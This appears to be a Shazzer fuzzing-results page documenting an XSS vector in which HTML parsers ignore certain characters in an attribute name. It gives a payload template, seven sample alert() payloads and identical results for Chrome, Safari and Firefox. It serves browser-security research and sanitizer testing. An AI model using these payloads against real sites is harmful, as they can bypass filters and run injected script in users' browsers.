Shazzer logo

    Characters ignored in an attribute name

    Chrome logo 7
    Safari logo 7
    Firefox logo 7

    This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.

    Created by: hackvertor

    Created on: Tuesday, May 28, 2024 at 7:38:17 PM

    Updated on: Friday, September 13, 2024 at 3:18:55 PM

    Vector type: XSS

    Template used:
    <div $[chr]="><img src=x:x onerror=log($[i])>"></div>
    Your browser was detected as:
    Detecting... Detecting... Detecting... Detecting...

    Sample payloads

    <div 	="><img src=x:x onerror=alert(9)>"></div>
    <div 
="><img src=x:x onerror=alert(10)>"></div>
    <div ="><img src=x:x onerror=alert(12)>"></div>
    <div 
="><img src=x:x onerror=alert(13)>"></div>
    <div  ="><img src=x:x onerror=alert(32)>"></div>
    <div /="><img src=x:x onerror=alert(47)>"></div>
    <div >="><img src=x:x onerror=alert(62)>"></div>

    Fuzz results

    Chrome logo
    Chrome 125.0.0.0 Unknown Unknown

    Updated

    Tue May 28 2024
    Found 7 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    472f/
    DecHexChr
    623e>
    Safari logo
    Safari 17.4 Unknown Unknown

    Updated

    Tue May 28 2024
    Found 7 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    472f/
    DecHexChr
    623e>
    Firefox logo
    Firefox 126.0 Unknown Unknown

    Updated

    Tue May 28 2024
    Found 7 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    472f/
    DecHexChr
    623e>
    Safari logo
    Safari 17.5 mobile iOS 17.5.1

    Updated

    Fri Jun 07 2024
    Found 7 results
    DecHexChr
    909HT
    DecHexChr
    100aLF
    DecHexChr
    120cFF
    DecHexChr
    130dCR
    DecHexChr
    3220SPACE
    DecHexChr
    472f/
    DecHexChr
    623e>